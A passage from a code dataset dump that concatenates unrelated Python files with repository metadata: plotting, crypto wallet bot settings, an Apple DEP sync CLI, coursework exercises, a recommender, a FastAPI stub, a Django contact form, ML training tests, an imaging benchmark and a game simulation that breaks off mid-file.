som.find_BMU(xx)\n plt.plot(w[0] + .5, w[1] + .5, markers[labels[cnt]], markersize=12, markerfacecolor=colors[labels[cnt]],\n markeredgecolor='k')\n\nplt.colorbar()\nplt.title('MySom')\n\nplt.show()\n\n\n\n","repo_name":"moisaoana/symbolic_analysis","sub_path":"Som_Code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14184089638","text":"\r\n\r\n# ===================================== options ===================================== #\r\n\r\n#----main-options----#\r\ncount_modules = 8 # кол-во модулей которые отработают из modules, т.е если в modules 5 модулей, то отработают рандомные 2 из 5\r\nshuffle = True # True / False. если нужно перемешать кошельки\r\n\r\ndecimal_places = 7 # количество знаков, после запятой для генерации случайных чисел\r\nvalue_eth = [0.00001, 0.00006] # минимальное и максимальное кол-во ETH для свапов и ликвы\r\n\r\ndelay_wallets = [10, 20] # минимальная и максимальная задержка между кошельками\r\ndelay_transactions = [10, 15] # минимальная и максимальная задержка между транзакциями\r\nwaiting_gas = 30 # макс значение газа при котором будет работать скрипт\r\nRETRY_COUNT = 2 # кол-во попыток при возникновении ошибок\r\n\r\n#------bot-options------#\r\nbot_status = False # True / False\r\nbot_token = '' # telegram bot token\r\nbot_id = 0 # telegram id\r\n\r\n#----modules-options----#\r\n\r\nsupply_scrollswap = True # True / False, при False будет работать только свап\r\n\r\nsupply_skydrome = True # True / False, при False будет работать только свап\r\n\r\nsupply_spaceswap = True # True / False, при False будет работать только свап\r\n\r\npercent_for_lending = 0.8 # процент от баланса для лендинга LayerBank\r\nwithdraw_layerbank = True # True / False, при False будет работать только сапплай\r\ncollateral_layerbank = True # True / False, нужен для вывода\r\n\r\npercent_for_wrap = 0.8 # процент от баланса для wrap eth\r\n\r\norbiter_bridge = False # True / False\r\ndozapravka_orbiter = [True, 0.0005] # True / False, будет работать если баланс ниже этого числа\r\nfrom_chain = 'Optimism' # Optimism | zkSync | Scrolll\r\nto_chain = 'Scrolll' # Optimism | zkSync | Scrolll\r\nvalue_for_bridge = [0.0063, 0.0075] # минимальное и максимальное кол-во ETH для бриджа через Orbiter\r\n\r\n# =================================== end-options =================================== #\r\n\r\n\r\n","repo_name":"WhereIsMyMindDL/Scroll","sub_path":"Scroll/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3555,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38185762473","text":"import argparse\nimport logging\nimport asyncio\nfrom commandment.dep.dep import DEP\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"consumer_key\", help=\"The decrypted consumer_key from the DEP stoken\")\nparser.add_argument(\"consumer_secret\", help=\"The decrypted consumer_secret from the DEP stoken\")\nparser.add_argument(\"access_token\", help=\"The decrypted access_token from the DEP stoken\")\nparser.add_argument(\"access_secret\", help=\"The decrypted access_secret from the DEP stoken\")\nparser.add_argument(\"--url\", help=\"The URL of the DEP Service\", default=\"https://mdmenrollment.apple.com\")\n\nlogger = logging.getLogger(__name__)\nlogging.getLogger('asyncio').setLevel(logging.WARNING)\n\nasync def initial_dep_fetch(dep: DEP):\n \"\"\"Perform the initial DEP fetch, if required.\"\"\"\n for page in dep.devices():\n for device in page:\n pass\n\nasync def dep_sync(consumer_key: str, consumer_secret: str, access_token: str, access_secret: str, url: str):\n dep = DEP(consumer_key, consumer_secret, access_token, access_secret, url)\n initial_fetch = await initial_dep_fetch(dep)\n\n\ndef main():\n args = parser.parse_args()\n logging.basicConfig(level=logging.DEBUG)\n loop = asyncio.get_event_loop()\n\n loop.run_until_complete(dep_sync(\n args.consumer_key,\n args.consumer_secret,\n args.access_token,\n args.access_secret,\n args.url,\n ))\n\n try:\n loop.run_forever()\n finally:\n loop.run_until_complete(loop.shutdown_asyncgens())\n loop.close()\n \n\nif __name__ == \"__main__\":\n main()\n","repo_name":"cmdmnt/commandment","sub_path":"commandment/dep/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","stars":277,"dataset":"github-code","pt":"77"} +{"seq_id":"29395810989","text":"#La función debe retornar la distancia como un string\n# +1 : si la distancia es mayor que 1\n# IB : si la distancia es 1, y para llegar de una palabra a la otra hay que\n# insertar o borrar una letra\n# 1S : si la distancia es 1 porque hay que sustituir una letra\n# 0D : si las palabras son iguales\n\ndef levenshtein(palabra1,palabra2):\n largo1=len(palabra1)\n largo2=len(palabra2)\n lista1=list(palabra1)\n lista2=list(palabra2)\n i=0\n \n if largo1==largo2:\n if palabra1==palabra2:\n return \"0D\"\n else:\n for n in lista1:\n if not n in lista2:\n i+=1\n if i==1:\n return \"1S\"\n else:\n return \"+1\"\n \n if largo1!=largo2:\n if largo1>largo2:\n i=largo1-largo2\n else:\n i=largo2-largo1\n for n in lista1:\n if not n in lista2:\n i+=1\n if i==1:\n return \"IB\"\n else:\n return \"+1\"\n\nif __name__==\"__main__\":\n palabra1=input()\n palabra2=input()\n resultado=levenshtein(palabra1,palabra2)\n print(resultado)\n ","repo_name":"pabloschwarzenberg/grader","sub_path":"tema10_ej2/tema10_ej2_bebf44c245edaa88ca4379a771ed4571.py","file_name":"tema10_ej2_bebf44c245edaa88ca4379a771ed4571.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27093824654","text":"from typing import List\nimport pandas as pd \nfrom surprise import SVD\nfrom surprise import Dataset\nfrom surprise import get_dataset_dir\nfrom surprise import Reader\n\n\nclass VoteEngine():\n\n def __init__(self, ):\n self.df = pd.read_csv(\"./models/track_votes.csv\")\n\n def get_recommendations(self, track_ids: List[str]):\n \"\"\"\n Get recommendations for a list of tracks\n \"\"\"\n\n df = self.df.sample(frac=0.05)\n \n votes = []\n for track_id in track_ids:\n votes.append([\"USER\", track_id, 5])\n \n df = df.append(votes)\n\n reader = Reader(rating_scale=(1, 5))\n data = Dataset.load_from_df(df[[\"uId\", \"tId\", \"rating\"]], reader)\n trainset = data.build_full_trainset()\n\n algo = SVD()\n algo.fit(trainset)\n\n \n recommendations = []\n\n for track in set(df[\"tId\"]):\n if track not in track_ids:\n pred = algo.predict(track, \"USER\").est\n\n if pred > 4:\n recommendations.append(( track, pred))\n\n # sort by second element of tuple\n recommendations = sorted(recommendations, key=lambda x: x[1], reverse=True)\n\n return [rec[0] for rec in recommendations[:10]]\n\n ","repo_name":"JorgeRuizDev/SpotMyFM","sub_path":"Ludwig/mir-backend/inference_engine/VoteEngine.py","file_name":"VoteEngine.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"16775076070","text":"from pprint import pprint\n\ndef solution(T):\n for l, layer in enumerate(T):\n if l == 0: continue\n for i in range(len(layer)):\n if i == 0:\n T[l][i] = T[l][i] + T[l - 1][i]\n elif i == len(layer) - 1:\n T[l][i] = T[l][i] + T[l - 1][i - 1]\n else:\n c1 = T[l][i] + T[l - 1][i]\n c2 = T[l][i] + T[l - 1][i - 1]\n T[l][i] = max(c1, c2)\n return max(T[-1])\n\n\nprint(solution([[7],\n [3, 8],\n [8, 1, 0],\n [2, 7, 4, 4],\n [4, 5, 2, 6, 5]])) # 30\n","repo_name":"choiasher/problem-solving","sub_path":"triangle.py","file_name":"triangle.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36563151848","text":"import fasttext\nimport html\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nblock_size = 256\n\nwith open('articolo.txt') as f:\n data = f.read().replace('\\n', '')\n\nmodel = fasttext.load_model('model_oroscopo.bin')\n\nscore = np.zeros(len(data))\nmax_divider = round(len(data) / block_size)\nprint(f\"Block size: {block_size}, data size: {len(data)}, pieces: {max_divider}\")\nfor divider in range(1, max_divider + 1):\n step = round(len(data) / divider)\n for start in range(0, len(data), step):\n end = start + step if start + step < len(data) else len(data)\n label, precision = model.predict(data[start:end])\n if 'oroscopo' in label[0]:\n score[start:end] += 1\n\nhtml_text = ''\nreturner = 150\nfor start in range(0, len(data), block_size):\n end = start + block_size if start + block_size < len(data) else len(data)\n a = sum(score[start:end]) / block_size / max_divider\n text = data[start:end]\n html_text += f'{html.escape(text)}'\nwith open('html.html', 'w') as f:\n f.write(html_text)\n","repo_name":"Ax6/NeuroFox","sub_path":"text-classifier/performance.py","file_name":"performance.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"20734266536","text":"from fastapi import FastAPI, HTTPException\n\n\nclass Day:\n def __init__(self, id, town, date, morning, daytime, night, humidity):\n self.id = id\n self.town = town\n self.date = date\n self.morning = morning\n self.daytime = daytime\n self.night = night\n self.humidity = humidity\n\n\ndays_list = [Day(0, \"Moscow\", \"01.01.2023\", \"-2\", \"1\", \"0\", \"80%\"),\n Day(1, \"Moscow\", \"29.12.2022\", \"-6\", \"-4\", \"-3\", \"65%\"),\n Day(2, \"Taganrog\", \"01.01.2023\", \"-8\", \"-10\", \"-7\", \"50%\")]\n\napp = FastAPI()\n\n\n@app.get(\"/v1/weather/{town}\")\nasync def weather(town):\n result = []\n for day in days_list:\n if day.town == town:\n result.append(day)\n return result\n\n\n@app.get(\"/v1/weather/{town}/{date}\")\nasync def weather(town, date):\n for day in days_list:\n if day.town == town and day.date == date:\n return day\n raise HTTPException(status_code=404, detail=\"Error\")\n","repo_name":"Parenek67/pain9","sub_path":"weather_service/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"45595025905","text":"## 실험용으로 친구 코드를 제출합니다\n\nfrom itertools import combinations\nfrom collections import deque\n\n# 입력 받기\nN, M = map(int, input().split())\narray_original = [list(map(int, input().split())) for _ in range(N)]\n\n# 벽만 남긴 2차원 리스트 초기화\narray_only_wall = [[0]*N for _ in range(N)]\n\n# bfs 탐색을 위한 리스트\ndr, dc = [1,-1,0,0], [0,0,1,-1]\n\n# 바이러스 위치를 담을 리스트\nvirus_pos = []\n\n# 벽을 제외한 영역의 크기\narea = 0\n\n# 연구소 전체 영역을 순회\nfor r in range(N):\n for c in range(N):\n # 바이러스 위치 담기\n if array_original[r][c] == 2:\n virus_pos.append((r, c))\n # 벽이 아닌 칸이라면, 영역의 크기 1 증가 밑 array_only_wall -1로 초기화\n if array_original[r][c] != 1:\n area += 1\n array_only_wall[r][c] = -1\n # 벽이라면, array_only_wall '-'로 초기화\n if array_original[r][c] == 1:\n array_only_wall[r][c] = '-'\n\n# 바이러스를 놓을 수 있는 모든 경우 생성\ntest_cases = combinations(virus_pos, M)\n\n# bfs 함수 구현\ndef bfs(case):\n # 덱 생성\n q = deque([])\n\n # 초기 바이러스 위치(r,c)와 시간(t)을 덱에 담기\n # 초기 바이러스이므로 시간은 0 \n for item in case:\n q.append((item[0],item[1],0))\n visited[item[0]][item[1]] = True\n \n # 연구소를 바이러스로 꽉 채우는 데에 걸리는 시간\n t_max = 0\n # 연구소를 채운 바이러스의 개수\n virus_cnt = M\n\n # 덱이 유지될 때 까지 반복\n while q:\n # 현재 위치 밑 시간\n r, c, t = q.popleft()\n # 상하좌우 네 방향 탐색\n for i in range(4):\n # 탐색할 칸\n rr, cc = r+dr[i], c+dc[i]\n # 만약 탐색할 칸이 연구소의 범위를 넘어가지 않는다면\n if 0<=rr.\r\n# ==============================================================================\r\nimport urllib.parse\r\nimport urllib.request\r\nimport json\r\n\r\nfrom django import forms\r\n\r\nfrom PortfolioSite import settings\r\n\r\nVERIFY_URL = 'https://www.google.com/recaptcha/api/siteverify'\r\n\r\n\r\nclass ContactForm(forms.Form):\r\n # https://en.wikipedia.org/wiki/Hubert_Blaine_Wolfeschlegelsteinhausenbergerdorff,_Sr.\r\n contact_name = forms.CharField(max_length=666, required=True)\r\n contact_email = forms.EmailField(required=True)\r\n message = forms.CharField(max_length=10000, required=True,\r\n widget=forms.Textarea)\r\n\r\n def __init__(self, *args, request=None, **kwargs):\r\n if request is None:\r\n raise ValueError('Missing required kwarg `request` (cannot be '\r\n '`None`)')\r\n self.request = request\r\n super(ContactForm, self).__init__(*args, **kwargs)\r\n\r\n def clean(self):\r\n ca = self.request.POST['g-recaptcha-response']\r\n params = {\r\n 'secret': settings.RECAPTCHA_SECRET_KEY,\r\n 'response': ca,\r\n }\r\n data = urllib.parse.urlencode(params).encode()\r\n req = urllib.request.Request(VERIFY_URL, data=data)\r\n response = urllib.request.urlopen(req)\r\n result = json.loads(response.read().decode())\r\n\r\n status = result.get('success', False)\r\n if not status:\r\n raise forms.ValidationError(\r\n 'Invalid reCAPTCHA. Please try again.',\r\n code='invalid',\r\n )\r\n return super(ContactForm, self).clean()\r\n","repo_name":"craymichael/PortfolioSite","sub_path":"portfolio/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10550475295","text":"import os\nfrom pathlib import Path\n\nimport pytest\nfrom hydra.core.hydra_config import HydraConfig\nfrom omegaconf import DictConfig, open_dict\n\nfrom src.train import train\nfrom tests.helpers.run_if import RunIf\n\n\ndef test_train_fast_dev_run(cfg_train: DictConfig) -> None:\n \"\"\"Run for 1 train, val and test step.\n\n :param cfg_train: A DictConfig containing a valid training configuration.\n \"\"\"\n HydraConfig().set_config(cfg_train)\n with open_dict(cfg_train):\n cfg_train.trainer.fast_dev_run = True\n cfg_train.trainer.accelerator = \"cpu\"\n train(cfg_train)\n\n\n@RunIf(min_gpus=1)\ndef test_train_fast_dev_run_gpu(cfg_train: DictConfig) -> None:\n \"\"\"Run for 1 train, val and test step on GPU.\n\n :param cfg_train: A DictConfig containing a valid training configuration.\n \"\"\"\n HydraConfig().set_config(cfg_train)\n with open_dict(cfg_train):\n cfg_train.trainer.fast_dev_run = True\n cfg_train.trainer.accelerator = \"gpu\"\n train(cfg_train)\n\n\n@RunIf(min_gpus=1)\n@pytest.mark.slow\ndef test_train_epoch_gpu_amp(cfg_train: DictConfig) -> None:\n \"\"\"Train 1 epoch on GPU with mixed-precision.\n\n :param cfg_train: A DictConfig containing a valid training configuration.\n \"\"\"\n HydraConfig().set_config(cfg_train)\n with open_dict(cfg_train):\n cfg_train.trainer.max_epochs = 1\n cfg_train.trainer.accelerator = \"gpu\"\n cfg_train.trainer.precision = 16\n train(cfg_train)\n\n\n@pytest.mark.slow\ndef test_train_epoch_double_val_loop(cfg_train: DictConfig) -> None:\n \"\"\"Train 1 epoch with validation loop twice per epoch.\n\n :param cfg_train: A DictConfig containing a valid training configuration.\n \"\"\"\n HydraConfig().set_config(cfg_train)\n with open_dict(cfg_train):\n cfg_train.trainer.max_epochs = 1\n cfg_train.trainer.val_check_interval = 0.5\n train(cfg_train)\n\n\n@pytest.mark.slow\ndef test_train_ddp_sim(cfg_train: DictConfig) -> None:\n \"\"\"Simulate DDP (Distributed Data Parallel) on 2 CPU processes.\n\n :param cfg_train: A DictConfig containing a valid training configuration.\n \"\"\"\n HydraConfig().set_config(cfg_train)\n with open_dict(cfg_train):\n cfg_train.trainer.max_epochs = 2\n cfg_train.trainer.accelerator = \"cpu\"\n cfg_train.trainer.devices = 2\n cfg_train.trainer.strategy = \"ddp_spawn\"\n train(cfg_train)\n\n\n@pytest.mark.slow\ndef test_train_resume(tmp_path: Path, cfg_train: DictConfig) -> None:\n \"\"\"Run 1 epoch, finish, and resume for another epoch.\n\n :param tmp_path: The temporary logging path.\n :param cfg_train: A DictConfig containing a valid training configuration.\n \"\"\"\n with open_dict(cfg_train):\n cfg_train.trainer.max_epochs = 1\n\n HydraConfig().set_config(cfg_train)\n metric_dict_1, _ = train(cfg_train)\n\n files = os.listdir(tmp_path / \"checkpoints\")\n assert \"last.ckpt\" in files\n assert \"epoch_000.ckpt\" in files\n\n with open_dict(cfg_train):\n cfg_train.ckpt_path = str(tmp_path / \"checkpoints\" / \"last.ckpt\")\n cfg_train.trainer.max_epochs = 2\n\n metric_dict_2, _ = train(cfg_train)\n\n files = os.listdir(tmp_path / \"checkpoints\")\n assert \"epoch_001.ckpt\" in files\n assert \"epoch_002.ckpt\" not in files\n\n assert metric_dict_1[\"train/acc\"] < metric_dict_2[\"train/acc\"]\n assert metric_dict_1[\"val/acc\"] < metric_dict_2[\"val/acc\"]\n","repo_name":"ashleve/lightning-hydra-template","sub_path":"tests/test_train.py","file_name":"test_train.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","stars":3116,"dataset":"github-code","pt":"77"} +{"seq_id":"16948962984","text":"# #############################################################################\n# benchmark_recon.py\n# =========\n# Authors :\n# Yohann PERRON\n# Eric BEZZAM [ebezzam@gmail.com]\n# #############################################################################\n\n\"\"\"\nBenchmark reconstruction algorithms\n==============\nThis script benchmarks reconstruction algorithms on the DiffuserCam test dataset.\nThe algorithm benchmarked and the number of iterations can be set in the config file : benchmark.yaml.\nFor unrolled algorithms, the results of the unrolled training (json file) are loaded from the benchmark/results folder.\n\"\"\"\n\nimport hydra\nfrom hydra.utils import get_original_cwd\n\nimport time\nimport numpy as np\nimport glob\nimport json\nimport os\nimport pathlib as plib\nfrom lensless.eval.benchmark import benchmark\nimport matplotlib.pyplot as plt\nfrom lensless import ADMM, FISTA, GradientDescent, NesterovGradientDescent\nfrom lensless.utils.dataset import DiffuserCamTestDataset, DigiCamCelebA\nfrom lensless.utils.io import save_image\n\nimport torch\nfrom torch.utils.data import Subset\n\n\n@hydra.main(version_base=None, config_path=\"../../configs\", config_name=\"benchmark\")\ndef benchmark_recon(config):\n\n # set seed\n torch.manual_seed(config.seed)\n np.random.seed(config.seed)\n generator = torch.Generator().manual_seed(config.seed)\n\n downsample = config.downsample\n n_files = config.n_files\n n_iter_range = config.n_iter_range\n\n # check if GPU is available\n if torch.cuda.is_available() and config.device[:4] == \"cuda\":\n device = config.device\n else:\n device = \"cpu\"\n\n # Benchmark dataset\n dataset = config.dataset\n if dataset == \"DiffuserCam\":\n benchmark_dataset = DiffuserCamTestDataset(n_files=n_files, downsample=downsample)\n psf = benchmark_dataset.psf.to(device)\n crop = None\n\n elif dataset == \"DigiCamCelebA\":\n\n dataset = DigiCamCelebA(\n data_dir=os.path.join(get_original_cwd(), config.files.dataset),\n celeba_root=config.files.celeba_root,\n psf_path=os.path.join(get_original_cwd(), config.files.psf),\n downsample=config.files.downsample,\n vertical_shift=config.files.vertical_shift,\n horizontal_shift=config.files.horizontal_shift,\n simulation_config=config.simulation,\n crop=config.files.crop,\n )\n dataset.psf = dataset.psf.to(device)\n psf = dataset.psf\n crop = dataset.crop\n\n # train-test split\n train_size = int((1 - config.files.test_size) * len(dataset))\n test_size = len(dataset) - train_size\n _, benchmark_dataset = torch.utils.data.random_split(\n dataset, [train_size, test_size], generator=generator\n )\n if config.n_files is not None:\n benchmark_dataset = Subset(benchmark_dataset, np.arange(config.n_files))\n else:\n raise ValueError(f\"Dataset {dataset} not supported\")\n\n print(f\"Number of files : {len(benchmark_dataset)}\")\n print(f\"Data shape : {dataset[0][0].shape}\")\n\n model_list = [] # list of algoritms to benchmark\n if \"ADMM\" in config.algorithms:\n model_list.append(\n (\n \"ADMM\",\n ADMM(\n psf,\n mu1=config.admm.mu1,\n mu2=config.admm.mu2,\n mu3=config.admm.mu3,\n tau=config.admm.tau,\n ),\n )\n )\n if \"ADMM_Monakhova2019\" in config.algorithms:\n model_list.append((\"ADMM_Monakhova2019\", ADMM(psf, mu1=1e-4, mu2=1e-4, mu3=1e-4, tau=2e-3)))\n if \"FISTA\" in config.algorithms:\n model_list.append((\"FISTA\", FISTA(psf, tk=config.fista.tk)))\n if \"GradientDescent\" in config.algorithms:\n model_list.append((\"GradientDescent\", GradientDescent(psf)))\n if \"NesterovGradientDescent\" in config.algorithms:\n model_list.append(\n (\n \"NesterovGradientDescent\",\n NesterovGradientDescent(psf, p=config.nesterov.p, mu=config.nesterov.mu),\n )\n )\n # APGD is not supported yet\n # if \"APGD\" in config.algorithms:\n # from lensless import APGD\n\n # model_list.append((\"APGD\", APGD(psf)))\n\n results = {}\n output_dir = None\n if config.save_idx is not None:\n\n assert np.max(config.save_idx) < len(\n benchmark_dataset\n ), \"save_idx values must be smaller than dataset size\"\n\n os.mkdir(\"GROUND_TRUTH\")\n for idx in config.save_idx:\n ground_truth = benchmark_dataset[idx][1]\n ground_truth_np = ground_truth.cpu().numpy()[0]\n\n if crop is not None:\n ground_truth_np = ground_truth_np[\n crop[\"vertical\"][0] : crop[\"vertical\"][1],\n crop[\"horizontal\"][0] : crop[\"horizontal\"][1],\n ]\n\n save_image(\n ground_truth_np,\n fp=os.path.join(\"GROUND_TRUTH\", f\"{idx}.png\"),\n )\n # benchmark each model for different number of iteration and append result to results\n # -- batchsize has to equal 1 as baseline models don't support batch processing\n start_time = time.time()\n for model_name, model in model_list:\n\n if config.save_idx is not None:\n # make directory for outputs\n os.mkdir(model_name)\n\n results[model_name] = dict()\n for n_iter in n_iter_range:\n\n print(f\"Running benchmark for {model_name} with {n_iter} iterations\")\n\n if config.save_idx is not None:\n output_dir = os.path.join(model_name, str(n_iter))\n os.mkdir(output_dir)\n\n result = benchmark(\n model,\n benchmark_dataset,\n batchsize=1,\n n_iter=n_iter,\n save_idx=config.save_idx,\n output_dir=output_dir,\n crop=crop,\n )\n results[model_name][int(n_iter)] = result\n\n # -- save results as easy to read JSON\n results_path = \"results.json\"\n with open(results_path, \"w\") as f:\n json.dump(results, f, indent=4)\n proc_time = (time.time() - start_time) / 60\n print(f\"Total processing time: {proc_time:.2f} min\")\n\n # create folder to load results from trained algorithms\n result_dir = os.path.join(get_original_cwd(), \"benchmark\", \"trained_results\")\n if not os.path.isdir(result_dir):\n os.mkdir(result_dir)\n\n # try to load json files with results form unrolled training\n files = glob.glob(os.path.join(result_dir, \"*.json\"))\n unrolled_results = {}\n for file in files:\n model_name = plib.Path(file).stem\n unrolled_results[model_name] = {}\n with open(file, \"r\") as f:\n result = json.load(f)\n\n # get result for each metric\n for metric in result.keys():\n # if list take last value (last epoch)\n if isinstance(result[metric], list):\n unrolled_results[model_name][metric] = result[metric][-1]\n else:\n unrolled_results[model_name][metric] = result[metric]\n\n # Baseline results\n baseline_label = config.baseline\n baseline_results = None\n if dataset == \"DiffuserCam\":\n # (Monakhova et al. 2019, https://arxiv.org/abs/1908.11502)\n # -- ADMM (100)\n if baseline_label == \"MONAKHOVA 100iter\":\n baseline_results = {\n \"MSE\": 0.0622,\n \"LPIPS_Alex\": 0.5711,\n \"ReconstructionError\": 13.62,\n }\n # -- ADMM (5)\n elif baseline_label == \"MONAKHOVA 5iter\":\n baseline_results = {\n \"MSE\": 0.1041,\n \"LPIPS_Alex\": 0.6309,\n \"ReconstructionError\": 11.32,\n }\n # -- Le-ADMM (Unrolled 5)\n elif baseline_label == \"MONAKHOVA Unrolled 5iter\":\n baseline_results = {\n \"MSE\": 0.0618,\n \"LPIPS_Alex\": 0.4434,\n \"ReconstructionError\": 13.70,\n }\n # -- Le-ADMM-U (Unrolled 5 + UNet post-denoiser)\n elif baseline_label == \"MONAKHOVA Unrolled 5iter + UNet\":\n baseline_results = {\n \"MSE\": 0.0074,\n \"LPIPS_Alex\": 0.1904,\n \"ReconstructionError\": 22.14,\n }\n else:\n raise ValueError(f\"Baseline {baseline_label} not supported\")\n\n # for each metrics plot the results comparing each model\n metrics_to_plot = [\"SSIM\", \"PSNR\", \"MSE\", \"LPIPS_Vgg\", \"LPIPS_Alex\", \"ReconstructionError\"]\n for metric in metrics_to_plot:\n plt.figure()\n # plot benchmarked algorithm\n for model_name in results.keys():\n plt.plot(\n n_iter_range,\n [results[model_name][n_iter][metric] for n_iter in n_iter_range],\n label=model_name,\n )\n # plot baseline as horizontal dotted line\n if baseline_results is not None:\n if metric in baseline_results.keys():\n plt.hlines(\n baseline_results[metric],\n 0,\n max(n_iter_range),\n linestyles=\"dashed\",\n label=baseline_label,\n color=\"orange\",\n )\n\n # plot unrolled algorithms results\n color_list = [\"red\", \"green\", \"blue\", \"orange\", \"purple\"]\n algorithm_colors = {}\n for model_name in unrolled_results.keys():\n # use algorithm name if defined, else use file name\n if \"algorithm\" in unrolled_results[model_name].keys():\n plot_name = unrolled_results[model_name][\"algorithm\"]\n else:\n plot_name = model_name\n\n # set color depending on plot name using same color for same algorithm\n first = False\n if plot_name not in algorithm_colors.keys():\n algorithm_colors[plot_name] = color_list.pop()\n first = True\n color = algorithm_colors[plot_name]\n\n # check if metric is defined\n if metric not in unrolled_results[model_name].keys():\n continue\n # if n_iter is undefined, plot as horizontal line\n if \"n_iter\" not in unrolled_results[model_name].keys():\n plt.hlines(\n unrolled_results[model_name][metric],\n 0,\n n_iter_range[-1],\n label=plot_name,\n linestyles=\"dashed\",\n colors=color,\n )\n else:\n # plot as point\n if first:\n plt.plot(\n unrolled_results[model_name][\"n_iter\"],\n unrolled_results[model_name][metric],\n label=plot_name,\n marker=\"o\",\n color=color,\n )\n else:\n plt.plot(\n unrolled_results[model_name][\"n_iter\"],\n unrolled_results[model_name][metric],\n marker=\"o\",\n color=color,\n )\n plt.xlabel(\"Number of iterations\", fontsize=\"12\")\n plt.ylabel(metric, fontsize=\"12\")\n if metric == \"ReconstructionError\":\n plt.legend(fontsize=\"12\")\n plt.grid()\n plt.savefig(f\"{metric}.png\")\n\n\nif __name__ == \"__main__\":\n benchmark_recon()\n","repo_name":"LCAV/LenslessPiCam","sub_path":"scripts/eval/benchmark_recon.py","file_name":"benchmark_recon.py","file_ext":"py","file_size_in_byte":11614,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"77"} +{"seq_id":"21622480210","text":"from django.shortcuts import render\nfrom .forms import DocumentForm\n# Create your views here.\n\n\ndef upload(request):\n if request.user.is_authenticated: \n # Is it better to use @login_required ?\n username = request.user.username\n else:\n username = ''\n if request.method == 'POST':\n form = DocumentForm(request.POST, request.FILES)\n if form.is_valid():\n doc = form.save()\n return render(request, 'upload.html', {\n \"form\": DocumentForm(),\n \"uploaded_file_url\": doc.myfile.url,\n \"username\": username,\n })\n else:\n form = DocumentForm()\n return render(request, 'upload.html', {\"form\": form})\n","repo_name":"pratham-shah28/NoCodeML","sub_path":"file_upload/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"45014921963","text":"from random import random\r\nfrom typing import List, Dict, Type, Union, Optional\r\n\r\nfrom log import debug, game_print\r\nfrom simulation.ai import Ai\r\nfrom simulation.base.dispenser import AttackerDispenser, DefenderDispenser, HealerDispenser, CollectorDispenser\r\nfrom simulation.base.game_object import GameObjects\r\nfrom simulation.base.dropped_item import Food, Egg, Logs, Hammer\r\nfrom simulation.base.terrain import Inspectable, Terrain, F, C\r\nfrom simulation.base.player import Player\r\nfrom simulation.player.attacker import Attacker\r\nfrom .penance import Penance\r\nfrom .players import Players\r\n\r\n\r\nclass Wave:\r\n SPAWN_HAMMER = 0b001 # For hnl_flags comparison of what we need to spawn.\r\n SPAWN_NEAR_LOGS = 0b010\r\n SPAWN_FAR_LOGS = 0b100\r\n\r\n # Only click_ methods AND inspect_ methods AND methods used exclusively by them (helpers)\r\n # AND __init__ AND __call__ should use the self.game property!!\r\n # All other methods should be passed the parameters they need explicitly!\r\n def __init__(self, wave_number: int, tick: int, game: Inspectable):\r\n self.end_flag = False\r\n self.game: Inspectable = game\r\n self.number: int = wave_number\r\n self.game.wave_number = self.number\r\n self.penance: Penance = Penance(self.game)\r\n self.dispensers = {\r\n \"a\": AttackerDispenser(self.game),\r\n \"d\": DefenderDispenser(self.game),\r\n \"h\": HealerDispenser(self.game),\r\n \"c\": CollectorDispenser(self.game),\r\n }\r\n\r\n # Currently, these are three different lists instead of a list of type List[DroppedItem] to ease processing.\r\n self.dropped_food: List[Food] = []\r\n self.dropped_eggs: List[Egg] = []\r\n self.dropped_hnls: List[Union[Hammer, Logs]] = [ # The term hnl will be used to indicate hammer and logs.\r\n Hammer(self.game), Logs(Logs.NEAR, self.game), Logs(Logs.FAR, self.game)\r\n ]\r\n self.hnl_flags = 0b000\r\n\r\n self.game_objects: GameObjects = GameObjects(self.game)\r\n self.start_tick: int = tick\r\n self.correct_calls: Dict[str, Optional[int]] = {\r\n \"a\": None, \"c\": None, \"d\": None, \"h\": None,\r\n }\r\n self.calls: Dict[str, Optional[int]] = { # The keys are accessed in Player.inspect_call,\r\n \"a\": None, \"c\": None, \"d\": None, \"h\": None, # be careful when changing.\r\n }\r\n\r\n def __call__(self) -> bool:\r\n # Wave starts on tick 0.\r\n # All ticks after this point, including the ones passed to the penance are normalized\r\n # with respect to the wave start through the use of self.relative_tick.\r\n #\r\n # Player code also relies on self.game.wave.relative_tick when making decisions.\r\n if self.relative_tick == Inspectable.WAVE and not self.end_flag:\r\n debug(\"Wave.__call__\", \"The wave ended unexpectedly due to a timeout.\")\r\n return False\r\n\r\n # Handle wave end.\r\n if self.end_flag:\r\n return False\r\n\r\n # Call changes.\r\n if self.relative_tick % Inspectable.CALL == 1:\r\n self.game.stall((self.change_call, (), {}))\r\n\r\n # If all the penance are dead and we're on a penance cycle.\r\n if not self.penance():\r\n self.game.stall((self.end, (), {}))\r\n\r\n if self.relative_tick % Inspectable.CYCLE == 0:\r\n # If we need to spawn hammer or logs, we do.\r\n if self.hnl_flags & 